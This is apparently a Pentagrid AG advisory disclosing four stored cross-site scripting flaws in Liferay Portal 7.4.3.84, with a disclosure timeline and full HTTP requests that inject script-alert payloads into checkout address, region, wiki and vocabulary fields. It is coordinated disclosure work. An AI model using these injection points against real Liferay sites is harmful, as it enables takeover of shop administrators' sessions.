Pentagrid AG (Posts about Liferay)

Persistent cross-site scripting vulnerabilities in Liferay Portal

Pentagrid AG — Tue, 17 Oct 2023 06:00:00 GMT

In 2023 we found multiple vulnerabilities in Liferay Portal, a digital experience platform for enterprise websites. It is a free and open-source software project. A few thousand installations on the Internet not suppressing the Liferay-Portal HTTP response header can be found via special purpose search engines.

The Liferay Portal in the Community Version is the foundation for the web interface of Liechtenstein's electronic health portal. That's the reason we got involved with the portal software – not as a customer pentest project, but out of interest. We wrote a blog post about the Liechtenstein's electronic health portal (blog post is in German). We reported our findings regarding the Liferay Portal to Liferay in order to get them addressed. Now we are releasing technical details about the vulnerabilities.

Another vulnerability we mentioned in the health portal is a Denial of Service attack, where a nested Graph QL query is not restricted by the portal and which consumes available resources leading to a Denial of Service. This vulnerability is known to Liferay.

Just so there are no misunderstandings: We did not try to use these vulnerabilities against Liechtenstein's electronic health portal.

Impact

Cross-Site-Scripting (XSS) allows an attacker to execute JavaScript in the attacked origin, enabling them to act as the exploited user of the website. A stored XSS is persistently contained in the application itself, waiting for the victim to trigger it.

While the below Cross-Site Scripting issues are all caused by missing output encoding, their impact varies greatly. The first XSS (CVE-2023-42627) can be triggered by a shop customer, meaning any person on the Internet, and is then only executed when a shop administrator visits the customer's address in the shop's administrative web interface. This is a perfect attack vector for an attacker to control the entire Liferay installation or at least the permissions of the visiting shop administrator. Therefore, we would rate this XSS as a high impact XSS.

However, the second to fourth XSS (CVE-2023-42627, CVE-2023-42628, CVE-2023-42629) can only be triggered by an administrator (or at least someone having the appropriate role/permission) by changing certain settings of Liferay. While the execution of HTML/JavaScript is not intended behavior and the proper output encoding is missing, the attack vector in this case is less attractive for an attacker, because the attacker can often not fulfil this precondition of having certain administrative permissions. Although Pentagrid is not aware of the entire role concept/permission model of Liferay, it is assumed that in most cases this only allows a user with certain administrator permissions to attack a user with other administrator permissions. As administrators in general control web page content (especially in Liferay where they can even get a groovy shell on the underlying server), we would rate these three XSS issues as informational or low impact. The CVSS version 3.1 scores can only model this attack vector in the "privilege required" attribute and therefore does not fully reflect the elaborated difference.

Timeline

2023-07-13: Initial contact of Liferay and report of XSS vulnerability in shipping address field to security@liferay.com.
2023-07-17: Report of an XSS vulnerability in wiki child pages via E-mail.
2023-07-17: Liferay replied that they verified the vulnerability and will notify after a patch is released.
2023-07-18: Report of an XSS vulnerability in country region field.
2023-07-19: Report of an XSS vulnerability in vocabulary descriptions field.
2023-09-11: Feedback from Liferay that the vocabulary XSS is fixed in version 7.4.3.88.
2023-09-12: Liferay communicated CVE-IDs assigned to vulnerabilities.
2023-10-13: Liferay reported a status about all fixes.
2023-10-17: Public release of advisory after 90 days after the last reported XSS.
2023-10-17: CVE-2023-42629: Liferay publishes their advisory on CVE-2023-42629 and rates the vulnerability with a CVSS 3.1 score of 9.0.
2023-10-17: CVE-2023-42628: Liferay publishes their advisory on CVE-2023-42628 and rates the vulnerability with a CVSS 3.1 score of 9.0.
2023-10-17: CVE-2023-42627: Liferay publishes their advisory on CVE-2023-42627 and rates the vulnerability with a CVSS 3.1 score of 9.6.

Affected Components

These vulnerabilities have been observed in the Liferay Community Edition Portal version 7.4.3.84.

Technical Details

1. Persistent cross-site scripting vulnerability via billing and shipping addresses (CVE-2023-42627)

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L, 8.3 High

When submitting an order, an attacker can inject malicious payloads. The following fields are vulnerable for both shipping and billing data: address, address2, address3, city and zip. See the following example which uses the Speedwell theme.

The corresponding HTTP request for injection via the shipping address is:

POST /web/speedwell/checkout?p_p_id=com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet&p_p_lifecycle=1&p_p_state=normal&p_p_mode=view&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_javax.portlet.action=%2Fcommerce_checkout%2Fsave_step HTTP/1.1
Host: localhost:9090
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 2212
Origin: http://localhost:9090
Connection: close
Referer: http://localhost:9090/web/speedwell/checkout/-/checkout/shipping-address/46a00ac9-65dc-9378-7d10-e61f5cbb170e
Cookie: JSESSIONID=C2B84470E3B173A060A9DFECBEA0D6DF; COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; LFR_SESSION_STATE_20099=1697454190791; COMPANY_ID=20096; ID=7857446563676c3536646b5467436b34616942714c413d3d; LFR_SESSION_STATE_20123=1697455841126; com.liferay.commerce.model.CommerceOrder#34144=46a00ac9-65dc-9378-7d10-e61f5cbb170e
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_formDate=1697455840993&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_checkoutStepName=shipping-address&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_commerceOrderUuid=46a00ac9-65dc-9378-7d10-e61f5cbb170e&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_redirect=http%3A%2F%2Flocalhost%3A9090%2Fweb%2Fspeedwell%2Fcheckout%2F-%2Fcheckout%2Fshipping-address%2F46a00ac9-65dc-9378-7d10-e61f5cbb170e&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_commerceAddress=0&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_newAddress=1&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_name=%3Cscript%3Ealert%28%22shipping_name%22%29%3C%2Fscript%3E&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_phoneNumber=%3Cscript%3Ealert%28%22shipping_phone%22%29%3C%2Fscript%3E&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_street1=%3Cscript%3Ealert%28%22shipping_address%22%29%3C%2Fscript%3E&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_countryId=20187&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_street2=%3Cscript%3Ealert%28%22shipping_address2%22%29%3C%2Fscript%3E&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_street3=%3Cscript%3Ealert%28%22shipping_address3%22%29%3C%2Fscript%3E&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_zip=%3Cscript%3Ealert%28%22shipping_zip%22%29%3C%2Fscript%3E&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_city=%3Cscript%3Ealert%28%22shipping_city%22%29%3C%2Fscript%3E&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_regionId=0&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_region
        Id=0&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_regionId=0&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_checkboxNames=use-as-billing&p_auth=GgaH6PDc

The corresponding HTTP request for injection via the billing address is:

POST /web/speedwell/checkout?p_p_id=com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet&p_p_lifecycle=1&p_p_state=normal&p_p_mode=view&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_javax.portlet.action=%2Fcommerce_checkout%2Fsave_step HTTP/1.1
Host: localhost:9090
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 2095
Origin: http://localhost:9090
Connection: close
Referer: http://localhost:9090/web/speedwell/checkout/-/checkout/billing-address/46a00ac9-65dc-9378-7d10-e61f5cbb170e
Cookie: JSESSIONID=C2B84470E3B173A060A9DFECBEA0D6DF; COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; LFR_SESSION_STATE_20099=1697454190791; COMPANY_ID=20096; ID=7857446563676c3536646b5467436b34616942714c413d3d; LFR_SESSION_STATE_20123=1697456017677; com.liferay.commerce.model.CommerceOrder#34144=46a00ac9-65dc-9378-7d10-e61f5cbb170e
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_formDate=1697456016443&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_checkoutStepName=billing-address&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_commerceOrderUuid=46a00ac9-65dc-9378-7d10-e61f5cbb170e&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_redirect=http%3A%2F%2Flocalhost%3A9090%2Fweb%2Fspeedwell%2Fcheckout%2F-%2Fcheckout%2Fbilling-address%2F46a00ac9-65dc-9378-7d10-e61f5cbb170e&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_commerceAddress=0&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_newAddress=1&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_name=%3Cscript%3Ealert%28%22billing_name%22%29%3C%2Fscript%3E&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_phoneNumber=%3Cscript%3Ealert%28%22billing_phone%22%29%3C%2Fscript%3E&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_street1=%3Cscript%3Ealert%28%22billing_adress%22%29%3C%2Fscript%3E&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_countryId=20187&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_street2=%3Cscript%3Ealert%28%22billing_adress2%22%29%3C%2Fscript%3E&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_street3=%3Cscript%3Ealert%28%22billing_adress3%22%29%3C%2Fscript%3E&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_zip=%3Cscript%3Ealert%28%22billing_zip%22%29%3C%2Fscript%3E&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_city=%3Cscript%3Ealert%28%22billing_city%22%29%3C%2Fscript%3E&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_regionId=0&_com_liferay_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_regionId=0&_com_li
feray_commerce_checkout_web_internal_portlet_CommerceCheckoutPortlet_regionId=0&p_auth=GgaH6PDc

Once the order is submitted, the payloads get executed in the browser of the victim (e.g. the shop owner) when they view the order details. The browser sends a GET request, for example:

GET /group/speedwell/~/control_panel/manage?p_p_id=com_liferay_commerce_order_web_internal_portlet_CommerceOrderPortlet&p_p_lifecycle=0&p_p_state=maximized&_com_liferay_commerce_order_web_internal_portlet_CommerceOrderPortlet_mvcRenderCommandName=%2Fcommerce_order%2Fedit_commerce_order&_com_liferay_commerce_order_web_internal_portlet_CommerceOrderPortlet_commerceOrderId=35980&p_p_auth=LRyvOYIu HTTP/1.1

The corresponding response contains:

HTTP/1.1 200
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, no-cache, no-store, must-revalidate
Pragma: no-cache
Liferay-Portal: Liferay Community Edition Portal
Content-Type: text/html;charset=UTF-8
Date: Mon, 16 Oct 2023 11:37:40 GMT
Connection: close
Content-Length: 99498


<div class="description">


    <p class="mb-0">
        <script>alert("billing_adress")</script>
    </p>


        <p class="mb-0">
            <script>alert("billing_adress2")</script>
        </p>

        <p class="mb-0">
            <script>alert("billing_adress3")</script>
        </p>


    <p class="mb-0">
        <script>alert("billing_city")</script>, <script>alert("billing_zip")</script>
    </p>
[...]
    <div class="description">

        <p class="mb-0">
            <script>alert("shipping_address")</script>
        </p>


            <p class="mb-0">
                <script>alert("shipping_address2")</script>
            </p>

            <p class="mb-0">
                <script>alert("shipping_address3")</script>
            </p>


        <p class="mb-0">
            <script>alert("shipping_city")</script>, <script>alert("shipping_zip")</script>
        </p>
[...]

Additionally, injections into the fields name and phone get executed when an attacker has set these as default billing or shipping addresses and the victim examines the account details afterwards. The menu for changing the default addresses is affected by this stored XSS vulnerability as well.

2. Persistent cross-site scripting vulnerability via country regions (CVE-2023-42627)

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N, 6.1 Medium

An attacker can inject arbitrary JavaScript or HTML code when adding country regions. A HTTP POST request for injecting JavaScript and HTML code is:

POST /group/guest/~/control_panel/manage?p_p_id=com_liferay_commerce_address_web_internal_portlet_CommerceCountryPortlet&p_p_lifecycle=1&p_p_state=maximized&p_p_mode=view&_com_liferay_commerce_address_web_internal_portlet_CommerceCountryPortlet_javax.portlet.action=%2Fcommerce_country%2Fedit_commerce_region&p_p_auth=olPu9S6s HTTP/1.1
Host: localhost:9090
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost:9090/group/guest/~/control_panel/client
x-csrf-token: GgaH6PDc
x-pjax: true
x-requested-with: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------195765885022298159623640673918
Content-Length: 2850
Origin: http://localhost:9090
Connection: close
Cookie: JSESSIONID=C2B84470E3B173A060A9DFECBEA0D6DF; COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; LFR_SESSION_STATE_20099=1697454190791; COMPANY_ID=20096; ID=7857446563676c3536646b5467436b34616942714c413d3d; LFR_SESSION_STATE_20123=1697455335712
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------195765885022298159623640673918
Content-Disposition: form-data; name="_com_liferay_commerce_address_web_internal_portlet_CommerceCountryPortlet_formDate"

1697455335661
-----------------------------195765885022298159623640673918
Content-Disposition: form-data; name="_com_liferay_commerce_address_web_internal_portlet_CommerceCountryPortlet_cmd"

add
-----------------------------195765885022298159623640673918
Content-Disposition: form-data; name="_com_liferay_commerce_address_web_internal_portlet_CommerceCountryPortlet_redirect"

http://localhost:9090/group/guest/~/control_panel/manage?p_p_id=com_liferay_commerce_address_web_internal_portlet_CommerceCountryPortlet&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_com_liferay_commerce_address_web_internal_portlet_CommerceCountryPortlet_mvcRenderCommandName=%2Fcommerce_country%2Fedit_commerce_country&_com_liferay_commerce_address_web_internal_portlet_CommerceCountryPortlet_redirect=http%3A%2F%2Flocalhost%3A9090%2Fgroup%2Fguest%2F%7E%2Fcontrol_panel%2Fmanage%3Fp_p_id%3Dcom_liferay_commerce_address_web_internal_portlet_CommerceCountryPortlet%26p_p_lifecycle%3D0%26p_p_state%3Dmaximized%26p_p_mode%3Dview%26p_p_auth%3DolPu9S6s&_com_liferay_commerce_address_web_internal_portlet_CommerceCountryPortlet_screenNavigationCategoryKey=regions&_com_liferay_commerce_address_web_internal_portlet_CommerceCountryPortlet_countryId=20916&p_p_auth=olPu9S6s
-----------------------------195765885022298159623640673918
Content-Disposition: form-data; name="_com_liferay_commerce_address_web_internal_portlet_CommerceCountryPortlet_countryId"

20916
-----------------------------195765885022298159623640673918
Content-Disposition: form-data; name="_com_liferay_commerce_address_web_internal_portlet_CommerceCountryPortlet_regionId"

0
-----------------------------195765885022298159623640673918
Content-Disposition: form-data; name="_com_liferay_commerce_address_web_internal_portlet_CommerceCountryPortlet_name"

<script>alert("region_name")</script>
-----------------------------195765885022298159623640673918
Content-Disposition: form-data; name="_com_liferay_commerce_address_web_internal_portlet_CommerceCountryPortlet_regionCode"

<script>alert("region_code")</script>
-----------------------------195765885022298159623640673918
Content-Disposition: form-data; name="_com_liferay_commerce_address_web_internal_portlet_CommerceCountryPortlet_position"

0.0
-----------------------------195765885022298159623640673918
Content-Disposition: form-data; name="_com_liferay_commerce_address_web_internal_portlet_CommerceCountryPortlet_checkboxNames"

active
-----------------------------195765885022298159623640673918
Content-Disposition: form-data; name="p_auth"

GgaH6PDc
-----------------------------195765885022298159623640673918--

These payloads get executed when a victim is examining the regions page. The corresponding HTTP GET request is:

GET /group/guest/~/control_panel/manage?p_p_id=com_liferay_commerce_address_web_internal_portlet_CommerceCountryPortlet&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_com_liferay_commerce_address_web_internal_portlet_CommerceCountryPortlet_mvcRenderCommandName=%2Fcommerce_country%2Fedit_commerce_country&_com_liferay_commerce_address_web_internal_portlet_CommerceCountryPortlet_redirect=http%3A%2F%2Flocalhost%3A9090%2Fgroup%2Fguest%2F%7E%2Fcontrol_panel%2Fmanage%3Fp_p_id%3Dcom_liferay_commerce_address_web_internal_portlet_CommerceCountryPortlet%26p_p_lifecycle%3D0%26p_p_state%3Dmaximized%26p_p_mode%3Dview%26p_p_auth%3DolPu9S6s&_com_liferay_commerce_address_web_internal_portlet_CommerceCountryPortlet_screenNavigationCategoryKey=regions&_com_liferay_commerce_address_web_internal_portlet_CommerceCountryPortlet_countryId=20916&p_p_auth=olPu9S6s HTTP/1.1
[...]

The server then returns the injected HTML ands JavaScript code in the reponse:

HTTP/1.1 200
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, no-cache, no-store, must-revalidate
Pragma: no-cache
Liferay-Portal: Liferay Community Edition Portal
Content-Type: text/html;charset=UTF-8
Date: Mon, 16 Oct 2023 11:24:20 GMT
Connection: close
Content-Length: 117171

[...]
<script>alert("region_name")</script></a>
[...]
        <td class="table-cell-expand lfr-regioncode-column" colspan="1">
                <script>alert("region_code")</script>
        </td>
[...]

3. Persistent cross-site scripting vulnerability via wiki child pages (CVE-2023-42628)

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N, 6.1 Medium

When adding a new child page in a wiki page, an attacker can inject malicious payloads into the content field. This payload gets executed in the browser of the victim when they visit the according parent page, because the payload is placed as text into the child page's container.

HTTP request:

POST /wiki?p_p_id=com_liferay_wiki_web_portlet_WikiPortlet&p_p_lifecycle=1&p_p_state=normal&p_p_mode=view&_com_liferay_wiki_web_portlet_WikiPortlet_javax.portlet.action=%2Fwiki%2Fedit_page&_com_liferay_wiki_web_portlet_WikiPortlet_mvcRenderCommandName=%2Fwiki%2Fedit_page HTTP/1.1
Host: localhost:9090
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost:9090/client
x-csrf-token: GgaH6PDc
x-pjax: true
x-requested-with: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------9342881932314680790817840128
Content-Length: 4704
Origin: http://localhost:9090
Connection: close
Cookie: JSESSIONID=C2B84470E3B173A060A9DFECBEA0D6DF; COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; LFR_SESSION_STATE_20099=1697454190791; COMPANY_ID=20096; ID=7857446563676c3536646b5467436b34616942714c413d3d; LFR_SESSION_STATE_20123=1697455074560
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------9342881932314680790817840128
Content-Disposition: form-data; name="_com_liferay_wiki_web_portlet_WikiPortlet_formDate"

1697455074387
-----------------------------9342881932314680790817840128
Content-Disposition: form-data; name="_com_liferay_wiki_web_portlet_WikiPortlet_cmd"

add
-----------------------------9342881932314680790817840128
Content-Disposition: form-data; name="_com_liferay_wiki_web_portlet_WikiPortlet_redirect"

http://localhost:9090/wiki/-/wiki/Main/FrontPage?p_r_p_http%3A%2F%2Fwww.liferay.com%2Fpublic-render-parameters%2Fwiki_nodeName=Main&p_r_p_http%3A%2F%2Fwww.liferay.com%2Fpublic-render-parameters%2Fwiki_nodeName=Main&p_r_p_http%3A%2F%2Fwww.liferay.com%2Fpublic-render-parameters%2Fwiki_nodeName=Main&p_r_p_http%3A%2F%2Fwww.liferay.com%2Fpublic-render-parameters%2Fwiki_title=FrontPage&p_r_p_http%3A%2F%2Fwww.liferay.com%2Fpublic-render-parameters%2Fwiki_title=FrontPage&p_r_p_http%3A%2F%2Fwww.liferay.com%2Fpublic-render-parameters%2Fwiki_title=FrontPage
-----------------------------9342881932314680790817840128
Content-Disposition: form-data; name="_com_liferay_wiki_web_portlet_WikiPortlet_editTitle"

true
-----------------------------9342881932314680790817840128
Content-Disposition: form-data; name="_com_liferay_wiki_web_portlet_WikiPortlet_nodeId"

35926
-----------------------------9342881932314680790817840128
Content-Disposition: form-data; name="_com_liferay_wiki_web_portlet_WikiPortlet_parentTitle"

FrontPage
-----------------------------9342881932314680790817840128
Content-Disposition: form-data; name="_com_liferay_wiki_web_portlet_WikiPortlet_workflowAction"

1
-----------------------------9342881932314680790817840128
Content-Disposition: form-data; name="_com_liferay_wiki_web_portlet_WikiPortlet_version"

0.0
-----------------------------9342881932314680790817840128
Content-Disposition: form-data; name="_com_liferay_wiki_web_portlet_WikiPortlet_title"

child page
-----------------------------9342881932314680790817840128
Content-Disposition: form-data; name="_com_liferay_wiki_web_portlet_WikiPortlet_contentEditor"


-----------------------------9342881932314680790817840128
Content-Disposition: form-data; name="_com_liferay_wiki_web_portlet_WikiPortlet_content"

<script>alert("child node")</script>


-----------------------------9342881932314680790817840128
Content-Disposition: form-data; name="_com_liferay_wiki_web_portlet_WikiPortlet_assetLinksSearchContainerPrimaryKeys"


-----------------------------9342881932314680790817840128
Content-Disposition: form-data; name="_com_liferay_wiki_web_portlet_WikiPortlet_assetLinkEntryIds"


-----------------------------9342881932314680790817840128
Content-Disposition: form-data; name="_com_liferay_wiki_web_portlet_WikiPortlet_summary"


-----------------------------9342881932314680790817840128
Content-Disposition: form-data; name="_com_liferay_wiki_web_portlet_WikiPortlet_format"

creole
-----------------------------9342881932314680790817840128
Content-Disposition: form-data; name="_com_liferay_wiki_web_portlet_WikiPortlet_inputPermissionsShowOptions"

false
-----------------------------9342881932314680790817840128
Content-Disposition: form-data; name="_com_liferay_wiki_web_portlet_WikiPortlet_inputPermissionsViewRole"

Guest
-----------------------------9342881932314680790817840128
Content-Disposition: form-data; name="_com_liferay_wiki_web_portlet_WikiPortlet_guestPermissions"

VIEW
-----------------------------9342881932314680790817840128
Content-Disposition: form-data; name="_com_liferay_wiki_web_portlet_WikiPortlet_guestPermissions"

ADD_DISCUSSION
-----------------------------9342881932314680790817840128
Content-Disposition: form-data; name="_com_liferay_wiki_web_portlet_WikiPortlet_groupPermissions"

UPDATE
-----------------------------9342881932314680790817840128
Content-Disposition: form-data; name="_com_liferay_wiki_web_portlet_WikiPortlet_groupPermissions"

SUBSCRIBE
-----------------------------9342881932314680790817840128
Content-Disposition: form-data; name="_com_liferay_wiki_web_portlet_WikiPortlet_groupPermissions"

VIEW
-----------------------------9342881932314680790817840128
Content-Disposition: form-data; name="_com_liferay_wiki_web_portlet_WikiPortlet_groupPermissions"

ADD_DISCUSSION
-----------------------------9342881932314680790817840128
Content-Disposition: form-data; name="p_auth"

GgaH6PDc
-----------------------------9342881932314680790817840128
Content-Disposition: form-data; name="_com_liferay_wiki_web_portlet_WikiPortlet_saveButton"


-----------------------------9342881932314680790817840128--

Later, the browser sends a GET request to retrieve the parent page, for example to the follwoing resource:

GET /wiki/-/wiki/Main/FrontPage?p_r_p_http%3A%2F%2Fwww.liferay.com%2Fpublic-render-parameters%2Fwiki_nodeName=Main&p_r_p_http%3A%2F%2Fwww.liferay.com%2Fpublic-render-parameters%2Fwiki_nodeName=Main&p_r_p_http%3A%2F%2Fwww.liferay.com%2Fpublic-render-parameters%2Fwiki_nodeName=Main&p_r_p_http%3A%2F%2Fwww.liferay.com%2Fpublic-render-parameters%2Fwiki_title=FrontPage&p_r_p_http%3A%2F%2Fwww.liferay.com%2Fpublic-render-parameters%2Fwiki_title=FrontPage&p_r_p_http%3A%2F%2Fwww.liferay.com%2Fpublic-render-parameters%2Fwiki_title=FrontPage HTTP/1.1
[...]

The corresponding HTTP response contains the injected JavaScript code:

HTTP/1.1 200
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, no-cache, no-store, must-revalidate
Pragma: no-cache
Liferay-Portal: Liferay Community Edition Portal
Content-Type: text/html;charset=UTF-8
Date: Mon, 16 Oct 2023 11:18:28 GMT
Connection: close
Content-Length: 178424

[...]]
<h4 class="text-default">Child Pages (1)</h4>
 <div>
  <ul class="list-group">
   <li class="list-group-item"><h3><a href="http://localhost:9090/wiki/-/wiki/Main/child+page?p_r_p_http%3A%2F%2Fwww.liferay.com%2Fpublic-render-parameters%2Fwiki_nodeName=Main&amp;p_r_p_http%3A%2F%2Fwww.liferay.com%2Fpublic-render-parameters%2Fwiki_title=child+page">child page</a></h3> <p class="text-default"><script>alert("child node")</script></p></li>
  </ul>
 </div>

4. Persistent cross-site scripting vulnerability via category vocabulary (CVE-2023-42629)

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N, 6.1 Medium

When adding new vocabulary to the categories, an attacker can inject a malicious payload into the description field. This payload gets executed in the browser of the victim when they visit the category page. If the malicious entry is not the first in the list, the payload gets executed once the victim selects the malicious entry.

HTTP request:

POST /group/speedwell/~/control_panel/manage/-/categories_admin/vocabularies/new?p_p_lifecycle=1&_com_liferay_asset_categories_admin_web_portlet_AssetCategoriesAdminPortlet_javax.portlet.action=%2Fasset_categories_admin%2Fedit_asset_vocabulary HTTP/1.1
Host: localhost:9090
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost:9090/group/speedwell/~/control_panel/manage/-/categories_admin/vocabularies/client
x-csrf-token: GgaH6PDc
x-pjax: true
x-requested-with: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------23385551494836211141651886319
Content-Length: 3949
Origin: http://localhost:9090
Connection: close
Cookie: JSESSIONID=C2B84470E3B173A060A9DFECBEA0D6DF; COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; LFR_SESSION_STATE_20099=1697454190791; COMPANY_ID=20096; ID=7857446563676c3536646b5467436b34616942714c413d3d; LFR_SESSION_STATE_20123=1697454288116
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------23385551494836211141651886319
Content-Disposition: form-data; name="_com_liferay_asset_categories_admin_web_portlet_AssetCategoriesAdminPortlet_formDate"

1697454287833
-----------------------------23385551494836211141651886319
Content-Disposition: form-data; name="_com_liferay_asset_categories_admin_web_portlet_AssetCategoriesAdminPortlet_redirect"

http://localhost:9090/group/speedwell/~/control_panel/manage/-/categories_admin/vocabularies
-----------------------------23385551494836211141651886319
Content-Disposition: form-data; name="_com_liferay_asset_categories_admin_web_portlet_AssetCategoriesAdminPortlet_vocabularyId"

0
-----------------------------23385551494836211141651886319
Content-Disposition: form-data; name="_com_liferay_asset_categories_admin_web_portlet_AssetCategoriesAdminPortlet_title"

MyCategory
-----------------------------23385551494836211141651886319
Content-Disposition: form-data; name="_com_liferay_asset_categories_admin_web_portlet_AssetCategoriesAdminPortlet_title_en_US"

MyCategory
-----------------------------23385551494836211141651886319
Content-Disposition: form-data; name="_com_liferay_asset_categories_admin_web_portlet_AssetCategoriesAdminPortlet_description"

<script>alert("description")</script>
-----------------------------23385551494836211141651886319
Content-Disposition: form-data; name="_com_liferay_asset_categories_admin_web_portlet_AssetCategoriesAdminPortlet_description_en_US"

<script>alert("description")</script>
-----------------------------23385551494836211141651886319
Content-Disposition: form-data; name="_com_liferay_asset_categories_admin_web_portlet_AssetCategoriesAdminPortlet_multiValued"

on
-----------------------------23385551494836211141651886319
Content-Disposition: form-data; name="_com_liferay_asset_categories_admin_web_portlet_AssetCategoriesAdminPortlet_visibilityType"

0
-----------------------------23385551494836211141651886319
Content-Disposition: form-data; name="_com_liferay_asset_categories_admin_web_portlet_AssetCategoriesAdminPortlet_classNameId0"

0
-----------------------------23385551494836211141651886319
Content-Disposition: form-data; name="_com_liferay_asset_categories_admin_web_portlet_AssetCategoriesAdminPortlet_subtype29955-classNameId0"

-1
-----------------------------23385551494836211141651886319
Content-Disposition: form-data; name="_com_liferay_asset_categories_admin_web_portlet_AssetCategoriesAdminPortlet_subtype20010-classNameId0"

-1
-----------------------------23385551494836211141651886319
Content-Disposition: form-data; name="_com_liferay_asset_categories_admin_web_portlet_AssetCategoriesAdminPortlet_indexes"

0
-----------------------------23385551494836211141651886319
Content-Disposition: form-data; name="_com_liferay_asset_categories_admin_web_portlet_AssetCategoriesAdminPortlet_inputPermissionsShowOptions"

false
-----------------------------23385551494836211141651886319
